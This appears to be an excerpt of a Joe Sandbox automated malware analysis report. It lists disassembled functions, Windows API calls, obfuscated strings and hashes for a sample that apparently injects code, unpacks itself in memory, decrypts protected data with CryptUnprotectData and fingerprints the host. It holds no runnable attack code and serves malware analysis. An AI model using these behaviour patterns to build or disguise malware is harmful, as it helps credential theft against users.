                                                              • Snapshot File: hcaresult_6_2_400000_etrtabd.jbxd
                                                              Similarity
                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                              • String ID:
                                                              • API String ID: 4152845823-0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 478 4019e3-401a48 call 4012a9 Sleep call 401524 493 401a57-401aa7 call 4012a9 478->493 494 401a4a-401a52 call 401615 478->494 494->493
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1649944947.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_etrtabd.jbxd
                                                              Similarity
                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                              • String ID:
                                                              • API String ID: 4152845823-0
                                                              • Opcode ID: a19bf6b6478727a7cf19fe344aa6eb98edbd1b9355ee0bc977b84921ba6b77a5
                                                              • Instruction ID: 3d34462ae554e6b9c52ec10bfc335e1d4eef14cf0cc07287d36856a9453ce069
                                                              • Opcode Fuzzy Hash: a19bf6b6478727a7cf19fe344aa6eb98edbd1b9355ee0bc977b84921ba6b77a5
                                                              • Instruction Fuzzy Hash: AA11E17274A205FBDB00AA949C41EBA3228AB45714F308577BA43780F1D57D8953BF6F

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 508 4019ee-401a48 call 4012a9 Sleep call 401524 521 401a57-401aa7 call 4012a9 508->521 522 401a4a-401a52 call 401615 508->522 522->521
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1649944947.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_etrtabd.jbxd
                                                              Similarity
                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                              • String ID:
                                                              • API String ID: 4152845823-0
                                                              • Opcode ID: c9c058988959fe6f1bebb02f4b63465d1859dbae07441d9c99848e32b1ac1650
                                                              • Instruction ID: fd11faa5c1113836d14621795cf3d83bd65fd701f71c993b701afff5049cc75c
                                                              • Opcode Fuzzy Hash: c9c058988959fe6f1bebb02f4b63465d1859dbae07441d9c99848e32b1ac1650
                                                              • Instruction Fuzzy Hash: 27018B3274A201EBDB009A949C42ABA3728AF45714F2045B7BA43B90F1C67D99536F2B
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1649944947.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_etrtabd.jbxd
                                                              Similarity
                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                              • String ID:
                                                              • API String ID: 4152845823-0
                                                              • Opcode ID: e11e32dbe801df22405823e13fb522a3676c7564745947c388d06d8c8a7d4e2f
                                                              • Instruction ID: 6cc9081dd0b90bd572a9145dab600ca03ca16d67528742debddf3dc55f5ee8c1
                                                              • Opcode Fuzzy Hash: e11e32dbe801df22405823e13fb522a3676c7564745947c388d06d8c8a7d4e2f
                                                              • Instruction Fuzzy Hash: 1A01C03274A105EBDB009A949C41EBA3328AB44710F308577BA43790F1C57D8A537F6F
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1649944947.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_etrtabd.jbxd
                                                              Similarity
                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                              • String ID:
                                                              • API String ID: 4152845823-0
                                                              • Opcode ID: cf05c8cd51f06970e1e68389e54baa8339b7ac568fc1d90295f4adfe3ec01b5a
                                                              • Instruction ID: 82411e1791d3a8170d7b0096784b0d07359e834b960e05cc8d1eb1f577d4cd17
                                                              • Opcode Fuzzy Hash: cf05c8cd51f06970e1e68389e54baa8339b7ac568fc1d90295f4adfe3ec01b5a
                                                              • Instruction Fuzzy Hash: 90018F3274A205EBDB00AAD4AC42EAA33289F45714F244577FA43B90F1C57D8A536F6B
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1649944947.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_etrtabd.jbxd
                                                              Similarity
                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                              • String ID:
                                                              • API String ID: 4152845823-0
                                                              • Opcode ID: 1ce4031546dc902cc4609c7e7de6d107d1fd440efca43239d715d6f2af8bec59
                                                              • Instruction ID: 961536146c74ce18795349366bfe527767909b26be76020be6548142ac7a4a5b
                                                              • Opcode Fuzzy Hash: 1ce4031546dc902cc4609c7e7de6d107d1fd440efca43239d715d6f2af8bec59
                                                              • Instruction Fuzzy Hash: 47018472705209EBCB00ABD09C42EA933249B45314F644577FA12B90F2D67D89536B2B
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 022063FA
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1651023063.0000000002203000.00000040.00000020.00020000.00000000.sdmp, Offset: 02203000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2203000_etrtabd.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                              • Instruction ID: 75c4353ebcd5f781d925fc842a44eb4d0d7595bd27661a22a0b3a73f15f8e29f
                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                              • Instruction Fuzzy Hash: 99113C79A00208EFDB01DF98C985E98BBF5AF08350F098094F9489B366D771EA90DF80
                                                              APIs
                                                              • UnhandledExceptionFilter.KERNEL32(00000000), ref: 0040BC59
                                                              • SetDefaultCommConfigA.KERNEL32(004230F0,?,00000000), ref: 0040BCAB
                                                              • SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040BCB5
                                                              • SleepEx.KERNEL32(00000000,00000000), ref: 0040BCBD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1650003513.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_40b000_etrtabd.jbxd
                                                              Similarity
                                                              • API ID: CalendarCommConfigDefaultExceptionFilterInfoSleepUnhandled
                                                              • String ID: -$d
                                                              • API String ID: 1714755991-1961052230
                                                              • Opcode ID: 767ce9f6e4b45859f0c898ce4a81191f8eb161bd46e591fa79638400a5444451
                                                              • Instruction ID: 611937db618160795b45420ca4b56ae8592046bfbc2aad96a730228e8614ca7d
                                                              • Opcode Fuzzy Hash: 767ce9f6e4b45859f0c898ce4a81191f8eb161bd46e591fa79638400a5444451
                                                              • Instruction Fuzzy Hash: 75119071D01228ABCB21DFA9ED859DFBFB8EF55714F10003AF105B6291CB344546CB99
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(01F6EC08), ref: 0040BB75
                                                              • GetProcAddress.KERNEL32(00000000,00427ED0), ref: 0040BBB2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1650003513.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_40b000_etrtabd.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID:
                                                              • API String ID: 1646373207-3916222277
                                                              • Opcode ID: f2f97dbd91ceef343cfa434ec76e2481c584c5966074daf8de3eed7171195444
                                                              • Instruction ID: 18c5cc9d400b96faee746cab7009418996affa1f81997e9bff723ab5a3e11860
                                                              • Opcode Fuzzy Hash: f2f97dbd91ceef343cfa434ec76e2481c584c5966074daf8de3eed7171195444
                                                              • Instruction Fuzzy Hash: CD31A03A66C7C4D8F321C7A4BD09B213B599B11B04F4184AAD550CB2BAD7FB0985C37E

                                                              Execution Graph

                                                              Execution Coverage:8%
                                                              Dynamic/Decrypted Code Coverage:32.9%
                                                              Signature Coverage:6.8%
                                                              Total number of Nodes:310
                                                              Total number of Limit Nodes:12

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: Object$DeleteSelect$CallbackDispatcherMetricsSystemUser
                                                              • String ID:
                                                              • API String ID: 1449868515-3916222277
                                                              • Opcode ID: 39b23aab81d1e412ac723355e7e0d380e93785fe029945261b041932a7300441
                                                              • Instruction ID: 60327d0f96a7b3deecf0ce21178eeb5ed9b1cd1e9f4d058b5d703ebe2579cb86
                                                              • Opcode Fuzzy Hash: 39b23aab81d1e412ac723355e7e0d380e93785fe029945261b041932a7300441
                                                              • Instruction Fuzzy Hash: C8B18CB85093808FE364DF29D58579BBBE0ABC9304F00892EE9D987350D7749548DF8A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 2PBb$Yceh$]hW9
                                                              • API String ID: 0-1551782443
                                                              • Opcode ID: f6dc15c76937f0d7342aa57ecbcc9b9ec27201aace4dd33c85c24a32b54af3b4
                                                              • Instruction ID: 0399154fc7d8c55f12102b5960697b3d06da357f666e701177502f53bd351286
                                                              • Opcode Fuzzy Hash: f6dc15c76937f0d7342aa57ecbcc9b9ec27201aace4dd33c85c24a32b54af3b4
                                                              • Instruction Fuzzy Hash: B7926C70208B908EE726CF35C4A07E7BBE1BF16305F44499DD1EB8B282DB796509CB55

                                                              Control-flow Graph

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: gdeb$gdeb$rr$}x$a_
                                                              • API String ID: 0-3617765606
                                                              • Opcode ID: ece44b61750e77531050f751d2c714b5c3d0fc1077405b2ce026a3a9abb68388
                                                              • Instruction ID: 6e898c47a17abb5f03504fba61c95c3f7ffb61a8dca5b2db11db91053f235b82
                                                              • Opcode Fuzzy Hash: ece44b61750e77531050f751d2c714b5c3d0fc1077405b2ce026a3a9abb68388
                                                              • Instruction Fuzzy Hash: 4E2278B4108381DFE320CF24D895B6BBBE0FB86308F54892DE5D99B262D7399505CF96

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0$01$ZR\;$[hct${hmn
                                                              • API String ID: 0-1484469362
                                                              • Opcode ID: 9addd3b863d326590257d70592a47e247d8e9e76fabce0ec909f09bc427e5ad8
                                                              • Instruction ID: 48ecf83dcb48e748d01dfa638aea1d50d8185787a1297f3da60f3c5648012799
                                                              • Opcode Fuzzy Hash: 9addd3b863d326590257d70592a47e247d8e9e76fabce0ec909f09bc427e5ad8
                                                              • Instruction Fuzzy Hash: 971202B02083818BE724CF15C4A476FBBE1BBC6348F144D2DE5D58B292D77AD809CB96
                                                              APIs
                                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0041564F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: CryptDataUnprotect
                                                              • String ID: .$=
                                                              • API String ID: 834300711-1678909263
                                                              • Opcode ID: 183ef4c1313d8aee56ada1eed8e8f16050662da6e108a753712437f4e389a81a
                                                              • Instruction ID: 1ba618c7c74fca3a6dab2d59277d8eb37d046adcbf7b7a58cf2c090dca870eab
                                                              • Opcode Fuzzy Hash: 183ef4c1313d8aee56ada1eed8e8f16050662da6e108a753712437f4e389a81a
                                                              • Instruction Fuzzy Hash: 9481D5B1508740CFD724CF29C49179BBBE2AFD6308F184A2EE1A58B392D739D945CB46
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: )$IEND
                                                              • API String ID: 0-707183367
                                                              • Opcode ID: e7903be39d4e34c9f5b2804a62402e159c365d2c7a7c9331be733edcae7195fd
                                                              • Instruction ID: 05b6572399bca2268092eb3df2821dc4a125dc7a7576062249b5a2d5c26daba1
                                                              • Opcode Fuzzy Hash: e7903be39d4e34c9f5b2804a62402e159c365d2c7a7c9331be733edcae7195fd
                                                              • Instruction Fuzzy Hash: 4CE1B1B2A083449BD714CF28D88175B7BE5ABD4314F14853EFA95AB3C1D778E904CB8A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: ]hiX$gdeb
                                                              • API String ID: 2994545307-4273025081
                                                              • Opcode ID: 7fbaa0d25f5ecf0750f065394b18b78656d35acff2d5509d26a22e1454e3b5db
                                                              • Instruction ID: 336b67656a256fc3d7c49e2fee8c29aa2d9fc5d5d61a2c4a19b8c8911d00a2fb
                                                              • Opcode Fuzzy Hash: 7fbaa0d25f5ecf0750f065394b18b78656d35acff2d5509d26a22e1454e3b5db
                                                              • Instruction Fuzzy Hash: B6C1E3B17083118FD714CF15D89172BBBE1EBD5318FA48A2EE4959B382D738D845CB8A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: IO
                                                              • API String ID: 0-3981347273
                                                              • Opcode ID: 29fb27968318ae9cb900c6618a64d07fe03029c203b194ad627e1d93fc6363e6
                                                              • Instruction ID: 51fd4917a3c3351c2bbf2a3dc6b6b13a62bcc2487d4881d1c48f1649ea521d72
                                                              • Opcode Fuzzy Hash: 29fb27968318ae9cb900c6618a64d07fe03029c203b194ad627e1d93fc6363e6
                                                              • Instruction Fuzzy Hash: 94D132B1200B018BD724CF15C590B52BBF2FF4A704F158A9DD89A8FB56D739E985CB88
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a5d886a9cf1d364aeba75cbb5fbc2a0112e377b092f9423ae5a3a5703b18e045
                                                              • Instruction ID: 02b8bb6e56041378f4f9f2711353cce18edc58b923ed8b10765db063976cd2a1
                                                              • Opcode Fuzzy Hash: a5d886a9cf1d364aeba75cbb5fbc2a0112e377b092f9423ae5a3a5703b18e045
                                                              • Instruction Fuzzy Hash: EA41BD745083528BC724CF14C8617ABB7E1FF89358F054A1DE9DA9B381E7389985CB8A
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6267cfd9be4afba129147b6b4996751238124f7394fccf3144a8ff5b67e9c5bc
                                                              • Instruction ID: 151cf318142fe4857ebf8dfdf36c3425f9736b69a2a980a3f824acb8caea4c7c
                                                              • Opcode Fuzzy Hash: 6267cfd9be4afba129147b6b4996751238124f7394fccf3144a8ff5b67e9c5bc
                                                              • Instruction Fuzzy Hash: 36F039B45093418FC320EF25D55474ABBE1ABD8304F01882DE489C7391DBB99858CF86

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph (node and edge list omitted); named calls in the graph: VirtualAlloc, VirtualProtect, VirtualFree, LoadLibraryA
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0212024D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID: cess$kernel32.dll
                                                              • API String ID: 4275171209-1230238691
                                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                              • Instruction ID: 6307871ac7b424446d8f48e480cf3fe90682051c211dfdc8c527356dcb06ef3a
                                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                              • Instruction Fuzzy Hash: 61526A74A01229DFDB64CF58C984BACBBB1BF09304F1581D9E54DAB351DB30AA99CF14

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph (node and edge list omitted); named calls in the graph: RtlExpandEnvironmentStrings
                                                              APIs
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0041D0A0
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0041D0CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings
                                                              • String ID: K-K/$U5U7$\1B3
                                                              • API String ID: 237503144-1235027928
                                                              • Opcode ID: c674b7651ea3e55e9227b54ef7b57f94361ab8414c6d31006c9343337da9bb58
                                                              • Instruction ID: 085b80d8ebaf4cdc089f22804327f41de0cf31be30b47905784d4d41386d2044
                                                              • Opcode Fuzzy Hash: c674b7651ea3e55e9227b54ef7b57f94361ab8414c6d31006c9343337da9bb58
                                                              • Instruction Fuzzy Hash: F76177B56083518FD324CF14C8A0BABB7E1EF8A308F054A1DE8E65B381D7749945CBA7

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph (node and edge list omitted); named calls in the graph: RtlExpandEnvironmentStrings
                                                              APIs
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 0041DA0A
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0041DA3A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings
                                                              • String ID: eI.K$qs
                                                              • API String ID: 237503144-3936219367
                                                              • Opcode ID: 85c26f031341337586e1b5fec7c34aa25b76f3d64f86288b9f1c02943ea52ba5
                                                              • Instruction ID: 3ad400ec4d5e0868339db15895de8c0dbb191545bfc635c07005ecffac5dc4ed
                                                              • Opcode Fuzzy Hash: 85c26f031341337586e1b5fec7c34aa25b76f3d64f86288b9f1c02943ea52ba5
                                                              • Instruction Fuzzy Hash: 915154B0100B009BD724CF26C890BA7BBB5FF46314F544A1CE8A64BB89D774F549CB98

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph (node and edge list omitted); named calls in the graph: GetStdHandle, GetConsoleWindow, ExitProcess
                                                              APIs
                                                              Strings
                                                              • of system that leetspeak, reflection primarily the of other modified on glyphs resemblance is replacements similarity or eleet the ways used character a often spellings on play uses their via internet. or it in, xrefs: 00408EDE
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: ExitProcess
                                                              • String ID: of system that leetspeak, reflection primarily the of other modified on glyphs resemblance is replacements similarity or eleet the ways used character a often spellings on play uses their via internet. or it in
                                                              • API String ID: 621844428-2804141084
                                                              • Opcode ID: d3fc2cdc024533b6e08ef3c83f20ae28995cdbdfa2716207c1ee4e745a0791f4
                                                              • Instruction ID: 4cc74d5fb66ad9159a78e8348017eb50dff1af742bc963a264908d0417922e34
                                                              • Opcode Fuzzy Hash: d3fc2cdc024533b6e08ef3c83f20ae28995cdbdfa2716207c1ee4e745a0791f4
                                                              • Instruction Fuzzy Hash: A5F0FFB0408202CEC750BF72D70626A7BA5AF64364F10593FEAD5A12D1EE3C84459E5F

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 416 4337fd-43385d call 439500 GetVolumeInformationW
                                                              APIs
                                                              • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00433840
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: InformationVolume
                                                              • String ID: :$C$\
                                                              • API String ID: 2039140958-3809124531
                                                              • Opcode ID: cbbe94e1d607de42a8e897c5ed6c7dfebdb6e6a87b75144c6ad5122602fa5c3d
                                                              • Instruction ID: 1368c0940c647f4f39a91e564e44146e6a68535283266bc39cb5798660f285bc
                                                              • Opcode Fuzzy Hash: cbbe94e1d607de42a8e897c5ed6c7dfebdb6e6a87b75144c6ad5122602fa5c3d
                                                              • Instruction Fuzzy Hash: 44F06575294701B7E718DF10EC56F1A32E0EB81B44F10482DB245AA1D0D7F5AA19DA5E
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: AllocString
                                                              • String ID: *$,
                                                              • API String ID: 2525500382-162240353
                                                              • Opcode ID: 6f887dd92c1e7d051b441eb50b8ce683dfa68637c71dffcb6e4b95598e80c62e
                                                              • Instruction ID: 8755544d7d26afcd6c5da590c34bf048d679cfec69adbb61e5b4e032c319a10d
                                                              • Opcode Fuzzy Hash: 6f887dd92c1e7d051b441eb50b8ce683dfa68637c71dffcb6e4b95598e80c62e
                                                              • Instruction Fuzzy Hash: 2641C27450D7C18ED371CB28845C78BBFE0AB9A324F148A4DE0E94B2E2CB74510ADB97
                                                              APIs
                                                              • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042893E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: InstalledMemoryPhysicallySystem
                                                              • String ID: sflQ
                                                              • API String ID: 3960555810-3249545781
                                                              APIs
                                                              • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042893E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: InstalledMemoryPhysicallySystem
                                                              • String ID: sflQ
                                                              • API String ID: 3960555810-3249545781
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000000,00000000), ref: 004355C8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID: \-"#
                                                              • API String ID: 3298025750-2514456039
                                                              APIs
